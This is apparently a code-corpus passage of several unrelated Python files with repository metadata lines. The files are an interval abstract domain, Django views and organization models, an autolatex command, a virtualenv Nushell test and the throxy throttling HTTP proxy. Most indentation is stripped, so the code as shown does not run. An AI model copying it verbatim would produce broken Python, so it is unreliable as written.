interval = Interval(constant, constant)
return interval
@property
def lower(self):
if self.empty():
return None
else:
return self._lower
@lower.setter
def lower(self, b):
assert b is not None
self._lower = b
@property
def upper(self):
if self.empty():
return None
else:
return self._upper
@upper.setter
def upper(self, b):
assert b is not None
self._upper = b
@property
def interval(self):
if self.empty():
return None
else:
return self.lower, self.upper
@interval.setter
def interval(self, bounds):
(lower, upper) = bounds
self.lower = lower
self.upper = upper
def empty(self) -> bool:
"""Return `True` if this interval is empty."""
return self._lower > self._upper
def set_empty(self) -> 'Interval':
"""Set this interval to be empty."""
self.interval = (1, 0)
return self
def finite(self) -> bool:
"""Return `True` if this interval is finite."""
return not ({self.lower, self.upper} & {-inf, inf})
def is_constant(self) -> bool:
"""Return `True` if this interval is equal to a single constant (different from infinity)."""
return self.lower == self.upper
@_check_types
def __eq__(self, other: 'Interval'):
return repr(self) == repr(other)
@_check_types
def __ne__(self, other: 'Interval'):
return not (self == other)
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __lt__(self, other):
return self.upper < other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __le__(self, other):
return self.upper <= other.lower
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __gt__(self, other):
return self.lower > other.upper
@_auto_convert_numbers
@_check_types
@_check_non_empty
def __ge__(self, other):
return self.lower >= other.upper
def __hash__(self):
return hash(repr(self))
def __repr__(self):
if self.empty():
return "∅"
else:
return f"[{self.lower},{self.upper}]"
# operators (they mutate self, no copy is made!!)
@_auto_convert_numbers
@_check_types
def add(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower + other.lower, self.upper + other.upper)
return self
@_auto_convert_numbers
@_check_types
def sub(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
self.interval = (self.lower - other.upper, self.upper - other.lower)
return self
@_auto_convert_numbers
@_check_types
def mult(self, other: Union['Interval', int]) -> 'Interval':
if self.empty() or other.empty():
return self.set_empty()
else:
comb = [self.lower * other.lower, self.lower * other.upper, self.upper * other.lower,
self.upper * other.upper]
self.interval = (min(comb), max(comb))
return self
def negate(self) -> 'Interval':
if self.empty():
return self
else:
self.interval = (-self.upper, -self.lower)
return self
# overload operators (do not mutate self, return a modified copy)
def __pos__(self):
copy = deepcopy(self)
return copy
def __neg__(self):
copy = deepcopy(self)
return copy.negate()
def __add__(self, other):
copy = deepcopy(self)
return copy.add(other)
def __sub__(self, other):
copy = deepcopy(self)
return copy.sub(other)
def __mul__(self, other):
copy = deepcopy(self)
return copy.mult(other)
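    # Doctest-style examples (a sketch; plain numbers are auto-converted to
    # intervals by the decorators above):
    # >>> Interval(1, 2) + Interval(10, 20)
    # [11,22]
    # >>> -Interval(-3, 5)
    # [-5,3]
    # >>> Interval(1, 2) * 3
    # [3,6]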
class IntervalLattice(Interval, BottomMixin):
@staticmethod
def from_constant(constant):
interval_lattice = IntervalLattice(constant, constant)
return interval_lattice
def __repr__(self):
if self.is_bottom():
return "⊥"
else:
return super().__repr__()
def top(self) -> 'IntervalLattice':
self.lower = -inf
self.upper = inf
return self
def is_top(self) -> bool:
return self._lower == -inf and self._upper == inf
def is_bottom(self) -> bool:
# we have to check if interval is empty, or got empty by an operation on this interval
if self.empty():
self.bottom()
return super().is_bottom()
def _less_equal(self, other: 'IntervalLattice') -> bool:
# NOTE: do not use less equal operator of plain interval since that has different semantics (every value in
# interval is less equal than any value in other interval)
return other.lower <= self.lower and self.upper <= other.upper
def _meet(self, other: 'IntervalLattice'):
self.lower = max(self.lower, other.lower)
self.upper = min(self.upper, other.upper)
return self
def _join(self, other: 'IntervalLattice') -> 'IntervalLattice':
self.lower = min(self.lower, other.lower)
self.upper = max(self.upper, other.upper)
return self
def _widening(self, other: 'IntervalLattice'):
        if other.lower < self.lower:
            self.lower = -inf
if other.upper > self.upper:
self.upper = inf
return self
@classmethod
def evaluate(cls, expr: Expression):
"""Evaluates an expression without variables, interpreting constants in the interval domain.
If this method encounters any variables, it raises a ``ValueError``.
"""
return cls._visitor.visit(expr)
# noinspection PyPep8Naming
class Visitor(ExpressionVisitor):
"""A visitor to abstractly evaluate an expression (without variables) in the interval domain."""
def generic_visit(self, expr, *args, **kwargs):
raise ValueError(
f"{type(self)} does not support generic visit of expressions! "
f"Define handling for expression {type(expr)} explicitly!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Index(self, _: Index, *args, **kwargs):
return IntervalLattice().top()
def visit_BinaryArithmeticOperation(self, expr: BinaryArithmeticOperation, *args, **kwargs):
l = self.visit(expr.left, *args, **kwargs)
r = self.visit(expr.right, *args, **kwargs)
if expr.operator == BinaryArithmeticOperation.Operator.Add:
return l.add(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Sub:
return l.sub(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Mult:
return l.mult(r)
elif expr.operator == BinaryArithmeticOperation.Operator.Div:
return l.top()
else:
raise ValueError(f"Binary operator '{str(expr.operator)}' is not supported!")
def visit_UnaryArithmeticOperation(self, expr: UnaryArithmeticOperation, *args, **kwargs):
r = self.visit(expr.expression, *args, **kwargs)
if expr.operator == UnaryArithmeticOperation.Operator.Add:
return r
elif expr.operator == UnaryArithmeticOperation.Operator.Sub:
return r.negate()
else:
raise ValueError(f"Unary Operator {expr.operator} is not supported!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Literal(self, expr: Literal, *args, **kwargs):
if expr.typ == int:
c = int(expr.val)
return IntervalLattice(c, c)
else:
raise ValueError(f"Literal type {expr.typ} is not supported!")
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Input(self, _: Input, *args, **kwargs):
return IntervalLattice().top()
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_ListInput(self, _: ListInput, *args, **kwargs):
return IntervalLattice().top()
def visit_ListDisplay(self, expr: ListDisplay, *args, **kwargs):
# find the big join of the intervals of all items of the list display expression
intervals = map(lambda item: self.visit(item, *args, **kwargs), expr.items)
return IntervalLattice().bottom().big_join(intervals)
_visitor = Visitor() # static class member shared between all instances
class IntervalDomain(Store, NumericalMixin, State):
def __init__(self, variables: List[VariableIdentifier]):
super().__init__(variables, {int: lambda _: IntervalLattice(), list: lambda _: IntervalLattice()})
def forget(self, var: VariableIdentifier):
self.store[var].top()
def set_bounds(self, var: VariableIdentifier, lower: int, upper: int):
self.store[var].lower = lower
self.store[var].upper = upper
def get_bounds(self, var: VariableIdentifier):
return self.store[var].lower, self.store[var].upper
def set_interval(self, var: VariableIdentifier, interval: IntervalLattice):
self.store[var].lower = interval.lower
self.store[var].upper = interval.upper
def set_lb(self, var: VariableIdentifier, constant):
self.store[var].lower = constant
def set_ub(self, var: VariableIdentifier, constant):
self.store[var].upper = constant
def evaluate(self, expr: Expression):
interval = IntervalDomain._visitor.visit(expr, self)
return interval
def _access_variable(self, variable: VariableIdentifier) -> Set[Expression]:
return {variable}
def _assign_variable(self, left: Expression, right: Expression) -> 'IntervalDomain':
if isinstance(left, VariableIdentifier):
if left.typ == int:
self.store[left] = IntervalDomain._visitor.visit(right, self)
else:
raise NotImplementedError("Interval domain does only support assignments to variables so far.")
return self
def _assume(self, condition: Expression) -> 'IntervalDomain':
# TODO implement this
return self
def _evaluate_literal(self, literal: Expression) -> Set[Expression]:
return {literal}
def enter_loop(self):
return self # nothing to be done
def exit_loop(self):
return self # nothing to be done
def enter_if(self):
return self # nothing to be done
def exit_if(self):
return self # nothing to be done
def _output(self, output: Expression) -> 'IntervalDomain':
return self # nothing to be done
def _substitute_variable(self, left: Expression, right: Expression):
raise NotImplementedError("Interval domain does not yet support variable substitution.")
# noinspection PyPep8Naming
class Visitor(IntervalLattice.Visitor):
"""A visitor to abstractly evaluate an expression (with variables) in the interval domain."""
# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_VariableIdentifier(self, expr: VariableIdentifier, interval_store, *args, **kwargs):
if expr.typ == int:
# copy the lattice element, since evaluation should not modify elements
return deepcopy(interval_store.store[expr])
else:
return IntervalLattice().top()
_visitor = Visitor() # static class member shared between all instances
| gitsimon/spadup-lyra | abstract_domains/numerical/interval_domain.py | Python | mpl-2.0 | 13,333 | 0.001876 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
gettext.install('glance', unicode=1)
| tylertian/Openstack | openstack F/glance/glance/__init__.py | Python | apache-2.0 | 733 | 0 |
import operator
import json
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from .models import County, GuardianCounted, Geo, Item, Station, Crime, State
from .utilities import states, get_dollars_donated_by_year, format_money
from .utilities import get_state_deaths, get_state_deaths_over_time, make_state_categories
from .utilities import get_state_violent_crime, get_county_deaths, create_counties_list
from .utilities import create_county_crime, make_per_capita_guns, state_abbrev
from .utilities import get_categories_per_capita, format_integer, get_state_property_crime
from .utilities import get_prop_crime_data, get_prop_crime_data_per_cap, format_float
from .utilities import get_viol_crime_data, get_viol_crime_data_per_cap, get_fatal_encounters
from .utilities import get_fatal_encounters_per_cap, get_military_value
from .utilities import get_military_value_per_cap
from rest_framework import viewsets
from .serializers import StateSerializer
from django.db.models import Sum, Func, Count, F
from nvd3 import *
from django.utils.safestring import mark_safe
class StateViewSet(viewsets.ReadOnlyModelViewSet):
queryset = State.objects.all().order_by('state')
serializer_class = StateSerializer
def index(request):
state_list = sorted(states.items(), key=operator.itemgetter(1))
context = {'states': state_list}
return render(request, "visualize/index.html", context)
def state(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, categories = make_state_categories(state)
ten_thirty_three_total = Item.objects.filter(state=state).aggregate(Sum('Total_Value'))['Total_Value__sum']
    twenty_fifteen_kills = GuardianCounted.objects.filter(state=state).count()
twenty_fifteen_population = County.objects.filter(state=states[state]).aggregate(Sum('pop_est_2015'))['pop_est_2015__sum']
context = {'state': state,
'state_num': state_deaths['2015 {} Fatal Encounters'.format(states[state])],
'average': state_deaths['2015 Average Fatal Encounters'],
'long_state_name': states[state],
'counties_list': create_counties_list(state),
'categories': categories,
'twenty_fourteen_violent': format_integer(state_obj.total_violent_crime),
'twenty_fourteen_property': format_integer(state_obj.total_property_crime),
'twenty_fifteen_kills': str(twenty_fifteen_kills),
'ten_thirty_three_total': format_money(ten_thirty_three_total),
'twenty_fifteen_population': format_integer(twenty_fifteen_population),
}
return render(request, "visualize/state.html", context)
def state_json(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, category_nums = make_state_categories(state)
per_capita_guns, per_capita_nums = make_per_capita_guns(state)
avg_violent_crime, per_capita_violent_crime = get_state_violent_crime(state_obj)
avg_property_crime, per_capita_property_crime = get_state_property_crime(state_obj)
data = {'state_deaths': [dict(key='State Deaths', values=[dict(label=key, value=value) for key, value in state_deaths.items()])],
'deaths_over_time': get_state_deaths_over_time(state),
'category_data': category_data,
'categories_per_capita': get_categories_per_capita(state, category_data),
'dollars_by_year': get_dollars_donated_by_year(state),
'avg_violent_crime': avg_violent_crime,
'per_capita_violent_crime': per_capita_violent_crime,
'per_capita_rifles': per_capita_guns,
'per_capita_nums': per_capita_nums,
'category_nums': category_nums,
'avg_property_crime': avg_property_crime,
'per_capita_property_crime': per_capita_property_crime}
return HttpResponse(json.dumps(data), content_type='application/json')
def county(request, county):
county_obj = County.objects.get(id=county)
total_num_counties_in_country = 3112
state = state_abbrev[county_obj.state]
state_obj = State.objects.get(state=state)
num_counties_in_state = len(County.objects.filter(state=county_obj.state))
county_pop = county_obj.pop_est_2015
state_pop = (State.objects.get(state=state)).total_population_twentyfifteen
us_population = State.objects.all().aggregate(Sum('total_population_twentyfifteen'))['total_population_twentyfifteen__sum']
county_violent = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('violent_crime'))['violent_crime__sum'])
county_property = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('property_crime'))['property_crime__sum'])
county_military_value = int(Item.objects.filter(county=county).aggregate(Sum('Total_Value'))['Total_Value__sum'])
county_fatal_encounters = int(GuardianCounted.objects.filter(county=county, date__year=2015).count())
county_crime = [county_violent, county_property]
average_state_crime_prop = get_prop_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_prop_per_cap = get_prop_crime_data_per_cap(
county_property, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_state_crime_viol = get_viol_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_viol_per_cap = get_viol_crime_data_per_cap(
county_violent, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_fatal_encounters = get_fatal_encounters(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_fatal_encounters_per_cap = get_fatal_encounters_per_cap(county_fatal_encounters, us_population,
state_pop, state, county_obj, state_obj, county_pop)
average_military_value = get_military_value(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_military_value_per_cap = get_military_value_per_cap(us_population, state_pop, county_pop,
county_military_value, state_obj, county_obj, state)
context = {
'military_value': mark_safe(json.dumps(average_military_value)),
'military_value_per_cap': mark_safe(json.dumps(average_military_value_per_cap)),
'prop_crime': mark_safe(json.dumps(average_state_crime_prop)),
"prop_crime_per_cap": mark_safe(json.dumps(average_state_crime_prop_per_cap)),
'viol_crime': mark_safe(json.dumps(average_state_crime_viol)),
"viol_crime_per_cap": mark_safe(json.dumps(average_state_crime_viol_per_cap)),
'average_fatal_encounters': mark_safe(json.dumps(average_fatal_encounters)),
'average_fatal_encounters_per_cap': mark_safe(json.dumps(average_fatal_encounters_per_cap)),
'county': county,
'county_obj': county_obj,
'twenty_fourteen_violent': format_integer(county_violent),
'twenty_fourteen_property': format_integer(county_property),
'twenty_fifteen_kills': format_integer(county_fatal_encounters),
'ten_thirty_three_total': format_money(county_military_value),
'counties_list': create_counties_list(state),
'county_pop_twenty_fifteen': format_integer(county_obj.pop_est_2015),
'state_abbrev': state,
}
return render(request, "visualize/county.html", context)
def about(request):
return render(request, "visualize/about.html")
| Bringing-Buzzwords-Home/bringing_buzzwords_home | visualize/views.py | Python | mit | 8,056 | 0.005462 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 1998-2021 Stephane Galland <galland@arakhne.org>
#
# This program is free library; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite
# 330, Boston, MA 02111-1307, USA.
import os
import logging
from autolatex2.cli.main import AbstractMakerAction
from autolatex2.utils.extprint import eprint
import gettext
_T = gettext.gettext
class MakerAction(AbstractMakerAction):
id = 'showconfigfiles'
help = _T('Display the list of the detected configuration files that will be read by autolatex')
def run(self, args) -> bool:
'''
Callback for running the command.
:param args: the arguments.
:return: True to continue process. False to stop the process.
'''
system_path = self.configuration.systemConfigFile
if system_path is not None:
if os.path.isfile(system_path):
if os.access(system_path, os.R_OK):
eprint(system_path)
else:
					logging.error(_T("%s (unreadable)") % (system_path))
else:
logging.error(_T("%s (not found)") % (system_path))
user_path = self.configuration.userConfigFile
if user_path is not None:
if os.path.isfile(user_path):
if os.access(user_path, os.R_OK):
eprint(user_path)
else:
logging.error(_T("%s (unreadable)") % (user_path))
else:
logging.error(_T("%s (not found)") % (user_path))
document_directory = self.configuration.documentDirectory
if document_directory is None:
logging.error(_T("Cannot detect document directory"))
else:
doc_path = self.configuration.makeDocumentConfigFilename(document_directory)
if doc_path is not None:
if os.path.isfile(doc_path):
if os.access(doc_path, os.R_OK):
eprint(doc_path)
else:
logging.error(_T("%s (unreadable)") % (doc_path))
else:
logging.error(_T("%s (not found)") % (doc_path))
return True
| gallandarakhneorg/autolatex | src/autolatex2/cli/commands/showconfigfiles.py | Python | lgpl-3.0 | 2,465 | 0.017039 |
import hashlib
from django.contrib.auth.models import Group
from django.db import models
USER_MODEL = 'auth.User'
class Organization( Group ):
'''
Umbrella object with which users are associated.
An organization can have multiple users.
'''
gravatar = models.EmailField( blank=True )
owner = models.ForeignKey( USER_MODEL )
users = models.ManyToManyField( USER_MODEL,
through='OrganizationUser',
related_name='organization_users' )
class Meta:
ordering = [ 'name' ]
verbose_name = 'organization'
verbose_name_plural = 'organizations'
def __unicode__( self ):
return self.name
def icon( self ):
if len( self.gravatar ) == 0:
return '//gravatar.com/avatar/0000000000000000000000000000000?d=mm'
m = hashlib.md5()
m.update( self.gravatar.strip().lower() )
return '//gravatar.com/avatar/%s' % ( m.hexdigest() )
def add_user( self, user ):
'''
Add a ( pending ) user to this organization.
'''
pending_user = OrganizationUser( user=user,
organization=self,
pending=True,
is_admin=False )
pending_user.save()
return pending_user
def has_user( self, user ):
org_user = OrganizationUser.objects.filter( user=user,
organization=self )
return len( org_user ) > 0
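    # Typical flow (a sketch with hypothetical users): add_user() creates a
    # *pending* membership, and has_user() reports True even before the
    # invitation is accepted:
    #
    #   org = Organization.objects.create(name='Lab', owner=alice)
    #   org.add_user(bob)
    #   org.has_user(bob)  # True, though still pending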
class OrganizationUser( models.Model ):
'''
ManyToMany through field relating Users to Organizations
Since it is possible for a User to be a member of multiple orgs this
class relates the OrganizationUser ot the User model using a ForeignKey
relationship, rather than a OneToOne relationship.
'''
user = models.ForeignKey( USER_MODEL,
related_name='organization_user' )
organization = models.ForeignKey( Organization,
related_name='organization_user' )
pending = models.BooleanField( default=True )
is_admin = models.BooleanField( default=False )
class Meta:
ordering = [ 'organization', 'user' ]
unique_together = ( 'user', 'organization' )
verbose_name = 'organization user'
verbose_name_plural = 'organization users'
def __unicode__( self ):
return '%s ( %s )' % ( self.user.username, self.organization.name )
| DHLabs/keep | keep_backend/organizations/models.py | Python | mit | 2,600 | 0.018846 |
from __future__ import absolute_import, unicode_literals
import sys
if sys.version_info > (3,):
from shutil import which
else:
from distutils.spawn import find_executable as which
from virtualenv.activation import NushellActivator
from virtualenv.info import IS_WIN
def test_nushell(activation_tester_class, activation_tester):
class Nushell(activation_tester_class):
def __init__(self, session):
cmd = which("nu")
if cmd is None and IS_WIN:
cmd = "c:\\program files\\nu\\bin\\nu.exe"
super(Nushell, self).__init__(NushellActivator, session, cmd, "activate.nu", "nu")
self.unix_line_ending = not IS_WIN
def print_prompt(self):
return r"echo $virtual_prompt; printf '\n'"
activation_tester(Nushell)
| pypa/virtualenv | tests/unit/activation/test_nushell.py | Python | mit | 816 | 0.001225 |
#! /usr/bin/env python
# throxy.py - HTTP proxy to simulate dial-up access
# Copyright (c) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Throxy: throttling HTTP proxy in one Python file
To use it, run this script on your local machine and adjust your
browser settings to use 127.0.0.1:8080 as HTTP proxy.
* Simulate a slow connection (like dial-up).
* Adjustable bandwidth limit for download and upload.
* Optionally dump HTTP headers and content for debugging.
* Decompress gzip content encoding for debugging.
* Multiple connections, without threads (uses asyncore).
* Only one source file, written in pure Python.
Simulate analog modem connection:
$ python throxy.py -u28.8 -d57.6
Show all HTTP headers (request & reply):
$ python throxy.py -qrs
Dump HTTP headers and content to a file, without size limits:
$ python throxy.py -rsRS -l0 -L0 -g0 > dump.txt
Tell command line tools to use the proxy:
$ export http_proxy=127.0.0.1:8080
"""
import sys
import asyncore
import socket
import time
import gzip
import struct
import cStringIO
import re
__revision__ = '$Rev: 1180 $'
KILO = 1000 # decimal or binary kilo
request_match = re.compile(r'^([A-Z]+) (\S+) (HTTP/\S+)$').match
def debug(message, newline=True):
"""Print message to stderr and clear the rest of the line."""
if options.quiet:
return
if newline:
message = message.ljust(79) + '\n'
sys.stderr.write(message)
class Header:
"""HTTP (request or reply) header parser."""
def __init__(self):
self.data = ''
self.lines = []
self.complete = False
def append(self, new_data):
"""
Add more data to the header.
Any data after the end of the header is returned, as it may
contain content, or even the start of the next request.
"""
self.data += new_data
while not self.complete:
newline = self.data.find('\n')
if newline < 0:
break # No complete line found
line = self.data[:newline].rstrip('\r')
if len(line):
self.lines.append(line)
else:
self.complete = True
self.content_type = self.extract('Content-Type')
self.content_encoding = self.extract('Content-Encoding')
if self.content_encoding == 'gzip':
self.gzip_data = cStringIO.StringIO()
self.data = self.data[newline+1:]
if self.complete:
rest = self.data
self.data = ''
return rest
else:
return ''
def extract(self, name, default=''):
"""Extract a header field."""
name = name.lower()
for line in self.lines:
if not line.count(':'):
continue
key, value = line.split(':', 1)
if key.lower() == name:
return value.strip()
return default
def extract_host(self):
"""Extract host and perform DNS lookup."""
self.host = self.extract('Host')
        if not self.host:
return
if self.host.count(':'):
self.host_name, self.host_port = self.host.split(':')
self.host_port = int(self.host_port)
else:
self.host_name = self.host
self.host_port = 80
self.host_ip = socket.gethostbyname(self.host_name)
self.host_addr = (self.host_ip, self.host_port)
def extract_request(self):
"""Extract path from HTTP request."""
match = request_match(self.lines[0])
if not match:
raise ValueError("malformed request line " + self.lines[0])
self.method, self.url, self.proto = match.groups()
if self.method.upper() == 'CONNECT':
raise ValueError("method CONNECT is not supported")
prefix = 'http://' + self.host
if not self.url.startswith(prefix):
raise ValueError("URL doesn't start with " + prefix)
self.path = self.url[len(prefix):]
def dump_title(self, from_addr, to_addr, direction, what):
"""Print a title before dumping headers or content."""
print '==== %s %s (%s:%d => %s:%d) ====' % (
direction, what,
from_addr[0], from_addr[1],
to_addr[0], to_addr[1])
def dump(self, from_addr, to_addr, direction='sending'):
"""Dump header lines to stdout."""
self.dump_title(from_addr, to_addr, direction, 'headers')
print '\n'.join(self.lines)
print
def dump_content(self, content, from_addr, to_addr, direction='sending'):
"""Dump content to stdout."""
self.dump_title(from_addr, to_addr, direction, 'content')
if self.content_encoding:
print "(%d bytes of %s with %s encoding)" % (len(content),
repr(self.content_type), repr(self.content_encoding))
else:
print "(%d bytes of %s)" % (len(content), repr(self.content_type))
if self.content_encoding == 'gzip':
if options.gzip_size_limit == 0 or \
self.gzip_data.tell() < options.gzip_size_limit:
self.gzip_data.write(content)
try:
content = self.gunzip()
except IOError, error:
content = 'Could not gunzip: ' + str(error)
if self.content_type.startswith('text/'):
limit = options.text_dump_limit
elif self.content_type.startswith('application/') and \
self.content_type.count('xml'):
limit = options.text_dump_limit
else:
limit = options.data_dump_limit
content = repr(content)
if len(content) < limit or limit == 0:
print content
else:
print content[:limit] + '(showing only %d bytes)' % limit
print
def gunzip(self):
"""Decompress gzip content."""
if options.gzip_size_limit and \
self.gzip_data.tell() > options.gzip_size_limit:
raise IOError("More than %d bytes" % options.gzip_size_limit)
self.gzip_data.seek(0) # Seek to start of data
try:
gzip_file = gzip.GzipFile(
fileobj=self.gzip_data, mode='rb')
result = gzip_file.read()
gzip_file.close()
except struct.error:
raise IOError("Caught struct.error from gzip module")
self.gzip_data.seek(0, 2) # Seek to end of data
return result
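# A minimal sketch of how Header is driven by the channels below (the raw
# request bytes are illustrative): append() consumes data up to the blank
# line that terminates the header and hands back any leftover bytes.
#
#     header = Header()
#     rest = header.append('GET http://example.com/ HTTP/1.1\r\n'
#                          'Host: example.com\r\n\r\nleftover')
#     # header.complete is True, rest == 'leftover'
#     # header.extract('Host') == 'example.com'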
class Throttle:
"""Bandwidth limit tracker."""
def __init__(self, kbps, interval=1.0):
self.bytes_per_second = int(kbps * KILO) / 8
self.interval = interval
self.fragment_size = min(512, self.bytes_per_second / 4)
self.transmit_log = []
self.weighted_throughput = 0.0
self.real_throughput = 0
self.last_updated = time.time()
def update_throughput(self, now):
"""Update weighted and real throughput."""
self.weighted_throughput = 0.0
self.real_throughput = 0
for timestamp, bytes in self.transmit_log:
# Event's age in seconds
age = now - timestamp
if age > self.interval:
continue
# Newer entries count more
weight = 2.0 * (self.interval - age) / self.interval
self.weighted_throughput += bytes * weight
self.real_throughput += bytes
self.last_updated = now
def trim_log(self):
"""Forget transmit log entries that are too old."""
now = time.time()
horizon = now - self.interval
popped = 0
while len(self.transmit_log) and self.transmit_log[0][0] <= horizon:
self.transmit_log.pop(0)
popped += 1
if popped or now - self.last_updated > 0.1:
self.update_throughput(now)
def log_sent_bytes(self, bytes):
"""Add timestamp and byte count to transmit log."""
self.transmit_log.append((time.time(), bytes))
self.update_throughput(time.time())
def sendable(self):
"""How many bytes can we send without exceeding bandwidth?"""
self.trim_log()
weighted_bytes = int(self.weighted_throughput / self.interval)
return max(0, self.bytes_per_second - weighted_bytes)
def weighted_kbps(self):
"""Compute recent bandwidth usage, in kbps."""
self.trim_log()
return 8 * self.weighted_throughput / float(KILO) / self.interval
def real_kbps(self):
"""Compute recent bandwidth usage, in kbps."""
self.trim_log()
return 8 * self.real_throughput / float(KILO) / self.interval
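# A worked example of the weighting above, assuming the default interval of
# 1.0 seconds: a 1000-byte send logged 0.25s ago gets weight
# 2.0 * (1.0 - 0.25) / 1.0 = 1.5 and counts as 1500 bytes of weighted
# throughput, while the same send 0.9s ago gets weight 0.2 and counts as only
# 200 bytes. sendable() then subtracts the weighted total (scaled by the
# interval) from bytes_per_second.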
class ThrottleSender(asyncore.dispatcher):
"""Data connection with send buffer and bandwidth limit."""
def __init__(self, throttle, channel=None):
self.throttle = throttle
if channel is None:
asyncore.dispatcher.__init__(self)
else:
asyncore.dispatcher.__init__(self, channel)
self.buffer = []
self.should_close = False
def writable(self):
"""Check if this channel is ready to write some data."""
return (len(self.buffer) and
self.throttle.sendable() / 2 > self.throttle.fragment_size)
def handle_write(self):
"""Write some data to the socket."""
max_bytes = self.throttle.sendable() / 2
if max_bytes < self.throttle.fragment_size:
return
bytes = self.send(self.buffer[0][:max_bytes])
self.throttle.log_sent_bytes(bytes)
if bytes == len(self.buffer[0]):
self.buffer.pop(0)
else:
self.buffer[0] = self.buffer[0][bytes:]
self.check_close()
def check_close(self):
"""Close if requested and all data was sent."""
if self.should_close and len(self.buffer) == 0:
self.close()
class ClientChannel(ThrottleSender):
"""A client connection."""
def __init__(self, channel, addr, download_throttle, upload_throttle):
ThrottleSender.__init__(self, download_throttle, channel)
self.upload_throttle = upload_throttle
self.addr = addr
self.header = Header()
self.content_length = 0
self.server = None
self.handle_connect()
def readable(self):
"""Check if this channel is ready to receive some data."""
return self.server is None or len(self.server.buffer) == 0
def handle_read(self):
"""Read some data from the client."""
data = self.recv(8192)
while len(data):
if self.content_length:
bytes = min(self.content_length, len(data))
self.server.buffer.append(data[:bytes])
if options.dump_send_content:
self.header.dump_content(
data[:bytes], self.addr, self.header.host_addr)
data = data[bytes:]
self.content_length -= bytes
if not len(data):
break
if self.header.complete and self.content_length == 0:
debug("client %s:%d sends a new request" % self.addr)
self.header = Header()
self.server = None
data = self.header.append(data)
if self.header.complete:
self.content_length = int(
self.header.extract('Content-Length', 0))
self.header.extract_host()
if options.dump_send_headers:
self.header.dump(self.addr, self.header.host_addr)
self.server = ServerChannel(
self, self.header, self.upload_throttle)
def handle_connect(self):
"""Print connect message to stderr."""
debug("client %s:%d connected" % self.addr)
def handle_close(self):
"""Print disconnect message to stderr."""
self.close()
debug("client %s:%d disconnected" % self.addr)
class ServerChannel(ThrottleSender):
"""Connection to HTTP server."""
def __init__(self, client, header, upload_throttle):
ThrottleSender.__init__(self, upload_throttle)
self.client = client
self.addr = header.host_addr
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect(self.addr)
self.send_header(header)
self.header = Header()
def send_header(self, header):
"""Send HTTP request header to the server."""
header.extract_request()
self.send_line(' '.join(
(header.method, header.path, header.proto)))
self.send_line('Connection: close')
for line in header.lines[1:]:
if not (line.startswith('Keep-Alive: ') or
line.startswith('Connection: ') or
line.startswith('Proxy-')):
self.send_line(line)
self.send_line('')
def send_line(self, line):
"""Send one line of the request header to the server."""
self.buffer.append(line + '\r\n')
def receive_header(self, header):
"""Send HTTP reply header to the client."""
for line in header.lines:
if not (line.startswith('Keep-Alive: ') or
line.startswith('Connection: ') or
line.startswith('Proxy-')):
self.receive_line(line)
self.receive_line('')
def receive_line(self, line):
"""Send one line of the reply header to the client."""
